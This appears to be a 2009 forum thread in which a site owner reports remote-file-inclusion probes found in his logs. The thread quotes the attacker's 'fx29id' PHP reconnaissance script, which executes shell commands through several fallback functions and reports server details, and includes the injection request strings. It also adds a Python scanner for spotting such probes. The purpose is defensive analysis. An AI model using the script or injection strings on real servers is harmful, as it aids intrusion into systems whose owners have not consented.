php injection script 'fx29id2.txt'

Posted: Tue May 05, 2009 3:17 am
by sak
Hello guys,
As seen in my logs someone is sending me an external php script the following way:
1. PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt
2. index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt??

I have opened the php script and basically it tests how well my server security is, I guess...
Can anyone supply further info about this script?
How do I track the sender?

by the way, this is the script:

Code:

<?php
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P   = @getcwd();
$IP  = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "<br>"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
  if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
  elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
  elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }  
  elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096);  } pclose($h); }
  else { $rez = "Error!"; }
  return $rez;
}
function vsize($size) {
  if (!is_numeric($size)) { return FALSE; }
  else {
    if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
    elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
    elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
    else { $size = $size . " B"; }
    return $size;
  }
}
function hdd($type) {
  $P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
  $hddspace = array("total" => vsize($T), "free"  => vsize($F), "used"  => vsize($U));
  return $hddspace[$type];
}
die("FeeLCoMz");
?>

Re: php injection script 'fx29id2.txt'

Posted: Wed May 06, 2009 7:58 am
by kaisellgren
sak wrote:1. PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt
2. index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt??
I'm not sure how he can do that. Even if you have register globals turned on, the $_SERVER shouldn't be rewritten.

The script you showed is a backdoor created by the intruder. It seems that he switched your document root server variable to his remote server's address and got access to your server.

What PHP version are you running? You should definitely turn off Register Globals and upgrade your PHP, as it seems that PHP is the one which is vulnerable here. No matter what settings I try, I cannot reproduce that kind of $_SERVER overwriting on my PHP 5.2.8.
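
The two requests quoted at the top of the thread are the classic shape of a remote-file-inclusion probe: a query parameter (here PHPLIB[libdir] and _SERVER[DOCUMENT_ROOT]) whose value is an absolute URL, and the trailing "??" is there so that whatever a vulnerable include appends lands in the attacker's query string instead of his path. The following scanner is an added example, not code from this thread; it pulls such requests out of ordinary Apache/nginx combined-format access logs and groups them by client IP, which answers the "how do I track the sender" question from the defender's side (your own logs). The log lines below are constructed; the IPs and timestamps are invented, the two request strings are the ones quoted in the thread.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined-format access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)
# A query name or value that is itself an absolute URL is the RFI-probe signature.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample log (invented IPs/timestamps; request strings as quoted in the thread).
SAMPLE_LOG = """\
203.0.113.7 - - [05/May/2009:02:51:13 +0000] "GET /index.php?PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [05/May/2009:02:51:14 +0000] "GET /index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.20 - - [05/May/2009:02:52:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.org/" "Mozilla/5.0"
"""


def rfi_findings(line):
    """Return (client_ip, [(param_name, injected_url), ...]) for one log line, or None if clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl percent-decodes names, so _SERVER%5BDOCUMENT_ROOT%5D becomes _SERVER[DOCUMENT_ROOT];
    # keep_blank_values keeps a bare "?http://host/x.txt" (no '=') so the name is inspected too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for candidate in (value, name):
            if REMOTE_URL_RE.match(candidate):
                hits.append((name, candidate))  # trailing "??" kept: it is part of the evidence
                break
    return (m.group("ip"), hits) if hits else None


def scan_log(text):
    """Map each client IP to the remote URLs it tried to inject, for blocking or an abuse report."""
    by_ip = {}
    for line in text.splitlines():
        found = rfi_findings(line)
        if found:
            ip, hits = found
            by_ip.setdefault(ip, []).extend(hits)
    return by_ip


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        for param, url in hits:
            print(f"{ip}\t{param}\t{url}")
```

Running it against a real log is a matter of passing the file contents to scan_log; the probe host names in the output are what the reply below means by "his domain name".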

Re: php injection script 'fx29id2.txt'

Posted: Sun May 10, 2009 12:40 am
by sak
Hello kaisellgren and thanks for your help!

Register_Globals is turned off and the PHP version is 5.2.9.
I don't think the one sending the script has really managed to get some info from the company server, since it is well-secured. However, I just wanted to know whether it is possible to track down the sender.
Thanks

Re: php injection script 'fx29id2.txt'

Posted: Sun May 10, 2009 6:30 am
by kaisellgren
sak wrote:Hello kaisellgren and thanks for your help!

Register_Globals is turned off and the PHP version is 5.2.9.
I don't think the one sending the script has really managed to get some info from the company server, since it is well-secured. However, I just wanted to know whether it is possible to track down the sender.
Thanks
Well, you have his domain name, try to track him down from there.